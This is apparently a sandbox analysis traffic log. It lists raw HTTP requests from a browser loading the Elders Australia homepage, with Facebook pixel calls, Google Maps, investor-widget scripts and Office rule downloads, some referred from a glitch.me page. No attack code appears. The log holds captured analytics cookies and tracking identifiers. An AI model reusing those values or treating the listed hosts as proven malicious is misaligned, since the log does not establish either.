      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/icon-up-arrow.f3ebe431.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /maps/embed?pb=!1m18!1m12!1m3!1d3271.301151004918!2d138.60046118650763!3d-34.92398350209179!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ab0cf2819431915%3A0x60d544ef0a2f07e6!2sElders!5e0!3m2!1sen!2sau!4v1669702553968!5m2!1sen!2sau HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /lib/1.15.18/yourir.css HTTP/1.1Host: yourir.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /lib/1.15.18/yourir.js HTTP/1.1Host: yourir.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /40cb4d5b590922d8.js HTTP/1.1Host: yourir.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /tr/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870998002&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870998002&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/community---events/events/lock_trial_site_set_up_shot.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/staff-in-action/staff-outdoors/elders_staff_infront_of_shed_and_machinery.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /tr/?id=253007270729203&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870999319&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=253007270729203&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870999319&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger=navigation-source, event-sourceReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/facebook.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/youtube.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /errors/500/ HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/community---events/events/2024_rai_event_net_zero_panel.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/branch-services/corporate-office-icon.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/linkedin.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /.model.json/ HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/xicon.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/Instagram.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /tr/?id=253007270729203&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870999319&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
